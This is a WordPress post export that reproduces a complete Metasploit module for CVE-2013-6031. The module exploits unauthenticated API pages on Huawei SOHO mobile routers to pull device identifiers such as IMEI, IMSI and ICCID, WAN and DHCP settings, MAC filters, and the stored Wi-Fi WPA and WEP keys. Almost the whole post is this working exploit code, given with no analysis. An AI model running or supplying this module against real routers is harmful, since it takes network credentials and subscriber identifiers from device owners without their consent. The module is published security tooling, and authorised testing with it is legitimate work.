##
# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n
require ‘base64’<\/p>\n
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report<\/p>\n
BASIC_INFO = {
‘Device Name’ => \/<DeviceName>(.*)<\\\/DeviceName>\/i,
‘Serial Number’ => \/<SerialNumber>(.*)<\\\/SerialNumber>\/i,
‘IMEI’ => \/<Imei>(.*)<\\\/Imei>\/i,
‘IMSI’ => \/<Imsi>(.*)<\\\/Imsi>\/i,
‘ICCID’ => \/<Iccid>(.*)<\\\/Iccid>\/i,
‘Hardware Version’ => \/<HardwareVersion>(.*)<\\\/HardwareVersion>\/i,
‘Software Version’ => \/<SoftwareVersion>(.*)<\\\/SoftwareVersion>\/i,
‘WebUI Version’ => \/<WebUIVersion>(.*)<\\\/WebUIVersion>\/i,
‘Mac Address1’ => \/<MacAddress1>(.*)<\\\/MacAddress1>\/i,
‘Mac Address2’ => \/<MacAddress2>(.*)<\\\/MacAddress2>\/i,
‘Product Family’ => \/<ProductFamily>(.*)<\\\/ProductFamily>\/i,
‘Classification’ => \/<Classify>(.*)<\\\/Classify>\/i
}<\/p>\n
WAN_INFO = {
‘Wan IP Address’ => \/<WanIPAddress>(.*)<\\\/WanIPAddress>\/i,
‘Primary Dns’ => \/<PrimaryDns>(.*)<\\\/PrimaryDns>\/i,
‘Secondary Dns’ => \/<SecondaryDns>(.*)<\\\/SecondaryDns>\/i
}<\/p>\n
DHCP_INFO ={
‘LAN IP Address’ => \/<DhcpIPAddress>(.*)<\\\/DhcpIPAddress>\/i,
‘DHCP StartIPAddress’ => \/<DhcpStartIPAddress>(.*)<\\\/DhcpStartIPAddress>\/i,
‘DHCP EndIPAddress’ => \/<DhcpEndIPAddress>(.*)<\\\/DhcpEndIPAddress>\/i,
‘DHCP Lease Time’ => \/<DhcpLeaseTime>(.*)<\\\/DhcpLeaseTime>\/i
}<\/p>\n
WIFI_INFO = {
‘Wifi WPA pre-shared key’ => \/<WifiWpapsk>(.*)<\\\/WifiWpapsk>\/i,
‘Wifi Auth mode’ => \/<WifiAuthmode>(.*)<\\\/WifiAuthmode>\/i,
‘Wifi Basic encryption modes’ => \/<WifiBasicencryptionmodes>(.*)<\\\/WifiBasicencryptionmodes>\/i,
‘Wifi WPA Encryption Modes’ => \/<WifiWpaencryptionmodes>(.*)<\\\/WifiWpaencryptionmodes>\/i,
‘Wifi WEP Key1’ => \/<WifiWepKey1>(.*)<\\\/WifiWepKey1>\/i,
‘Wifi WEP Key2’ => \/<WifiWepKey2>(.*)<\\\/WifiWepKey2>\/i,
‘Wifi WEP Key3’ => \/<WifiWepKey3>(.*)<\\\/WifiWepKey3>\/i,
‘Wifi WEP Key4’ => \/<WifiWepKey4>(.*)<\\\/WifiWepKey4>\/i,
‘Wifi WEP Key Index’ => \/<WifiWepKeyIndex>(.*)<\\\/WifiWepKeyIndex>\/i
}<\/p>\n
def initialize(info={})
super(update_info(info,
‘Name’ => “Huawei Datacard Information Disclosure Vulnerability”,
‘Description’ => %q{
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the \/api pages where
authentication is not required, allowing configuration changes as well as information
disclosure, including any stored SMS.
},
‘License’ => MSF_LICENSE,
‘Author’ =>
[
‘Jimson K James’,
‘Tom James <tomsmaily[at]aczire.com>’, # Msf module
],
‘References’ =>
[
[‘CWE’, ‘425’],
[‘CVE’, ‘2013-6031’],
[‘US-CERT-VU’, ‘341526’]],
‘DisclosureDate’ => ‘2013-11-11’ ))<\/p>\n
register_options(
[
Opt::RHOST(‘mobilewifi.home’)
])<\/p>\n
end<\/p>\n
# Gather basic router information
def run
get_router_info
print_line(”)
get_router_mac_filter_info
print_line(”)
get_router_wan_info
print_line(”)
get_router_dhcp_info
print_line(”)
get_wifi_info
end<\/p>\n
def get_wifi_info<\/p>\n
print_status(“Getting WiFi Key details…”)
res = send_request_raw(
{
‘method’ => ‘GET’,
‘uri’ => ‘\/api\/wlan\/security-settings’,
})<\/p>\n
unless is_target?(res)
return
end<\/p>\n
resp_body = res.body.to_s
log = ”<\/p>\n
print_status(“WiFi Key Details”)<\/p>\n
wifi_ssid = get_router_ssid
if wifi_ssid
print_status(“WiFi SSID: #{wifi_ssid}”)
log << “WiFi SSID: #{wifi_ssid}\\n”
end<\/p>\n
WIFI_INFO.each do |k,v|
if resp_body.match(v)
info = $1
print_status(“#{k}: #{info}”)
log << “#{k}: #{info}\\n”
end
end<\/p>\n
report_note(
:host => rhost,
:type => ‘wifi_keys’,
:data => log
)
end<\/p>\n
def get_router_info<\/p>\n
print_status(“Gathering basic device information…”)
res = send_request_raw(
{
‘method’ => ‘GET’,
‘uri’ => ‘\/api\/device\/information’,
})<\/p>\n
unless is_target?(res)
return
end<\/p>\n
resp_body = res.body.to_s<\/p>\n
print_status(“Basic Information”)<\/p>\n
BASIC_INFO.each do |k,v|
if resp_body.match(v)
info = $1
print_status(“#{k}: #{info}”)
end
end
end<\/p>\n
def get_router_ssid
print_status(“Gathering device SSID…”)<\/p>\n
res = send_request_raw(
{
‘method’ => ‘GET’,
‘uri’ => ‘\/api\/wlan\/basic-settings’,
})<\/p>\n
# check whether we got any response from server and proceed.
unless is_target?(res)
return nil
end<\/p>\n
resp_body = res.body.to_s<\/p>\n
# Grabbing the Wifi SSID
if resp_body.match(\/<WifiSsid>(.*)<\\\/WifiSsid>\/i)
return $1
end<\/p>\n
nil
end<\/p>\n
def get_router_mac_filter_info
print_status(“Gathering MAC filters…”)
res = send_request_raw(
{
‘method’ => ‘GET’,
‘uri’ => ‘\/api\/wlan\/mac-filter’,
})<\/p>\n
unless is_target?(res)
return
end<\/p>\n
print_status(‘MAC Filter Information’)<\/p>\n
resp_body = res.body.to_s<\/p>\n
if resp_body.match(\/<WifiMacFilterStatus>(.*)<\\\/WifiMacFilterStatus>\/i)
wifi_mac_filter_status = $1
print_status(“Wifi MAC Filter Status: #{(wifi_mac_filter_status == ‘1’) ? ‘ENABLED’ : ‘DISABLED’}” )
end<\/p>\n
(0..9).each do |i|
if resp_body.match(\/<WifiMacFilterMac#{i}>(.*)<\\\/WifiMacFilterMac#{i}>\/i)
wifi_mac_filter = $1
unless wifi_mac_filter.empty?
print_status(“Mac: #{wifi_mac_filter}”)
end
end
end
end<\/p>\n
def get_router_wan_info
print_status(“Gathering WAN information…”)
res = send_request_raw(
{
‘method’ => ‘GET’,
‘uri’ => ‘\/api\/monitoring\/status’,
})<\/p>\n
unless is_target?(res)
return
end<\/p>\n
resp_body = res.body.to_s<\/p>\n
print_status(‘WAN Details’)<\/p>\n
WAN_INFO.each do |k,v|
if resp_body.match(v)
info = $1
print_status(“#{k}: #{info}”)
end
end
end<\/p>\n
def get_router_dhcp_info
print_status(“Gathering DHCP information…”)
res = send_request_raw(
{
‘method’ => ‘GET’,
‘uri’ => ‘\/api\/dhcp\/settings’,
})<\/p>\n
unless is_target?(res)
return
end<\/p>\n
resp_body = res.body.to_s<\/p>\n
print_status(‘DHCP Details’)<\/p>\n
# Grabbing the DhcpStatus
if resp_body.match(\/<DhcpStatus>(.*)<\\\/DhcpStatus>\/i)
dhcp_status = $1
print_status(“DHCP: #{(dhcp_status == ‘1’) ? ‘ENABLED’ : ‘DISABLED’}”)
end<\/p>\n
unless dhcp_status && dhcp_status == ‘1’
return
end<\/p>\n
DHCP_INFO.each do |k,v|
if resp_body.match(v)
info = $1
print_status(“#{k}: #{info}”)
end
end
end<\/p>\n
def is_target?(res)
# check whether we got any response from server and proceed.
unless res
print_error(“Failed to get any response from server”)
return false
end<\/p>\n
# Is it a HTTP OK
unless res.code == 200
print_error(“Did not get HTTP 200, URL was not found”)
return false
end<\/p>\n
# Check to verify server reported is a Huawei router
unless res.headers[‘Server’].match(\/IPWEBS\\\/1.4.0\/i)
print_error(“Target doesn’t seem to be a Huawei router”)
return false
end<\/p>\n
true
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"
### This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## require ‘base64’ class MetasploitModule < Msf::Auxiliaryinclude Msf::Exploit::Remote::HttpClientinclude Msf::Auxiliary::Report BASIC_INFO = {‘Device Name’ => \/<DeviceName>(.*)<\\\/DeviceName>\/i,‘Serial Number’ => \/<SerialNumber>(.*)<\\\/SerialNumber>\/i,‘IMEI’ => \/<Imei>(.*)<\\\/Imei>\/i,‘IMSI’ => \/<Imsi>(.*)<\\\/Imsi>\/i,‘ICCID’ => \/<Iccid>(.*)<\\\/Iccid>\/i,‘Hardware Version’ => \/<HardwareVersion>(.*)<\\\/HardwareVersion>\/i,‘Software Version’ => \/<SoftwareVersion>(.*)<\\\/SoftwareVersion>\/i,‘WebUI Version’ => \/<WebUIVersion>(.*)<\\\/WebUIVersion>\/i,‘Mac Address1’ => \/<MacAddress1>(.*)<\\\/MacAddress1>\/i,‘Mac Address2’ => \/<MacAddress2>(.*)<\\\/MacAddress2>\/i,‘Product Family’ => \/<ProductFamily>(.*)<\\\/ProductFamily>\/i,‘Classification’ => \/<Classify>(.*)<\\\/Classify>\/i} WAN_INFO = {‘Wan …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59291","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59291","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59291"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59291\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59291"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59291"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=59291"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}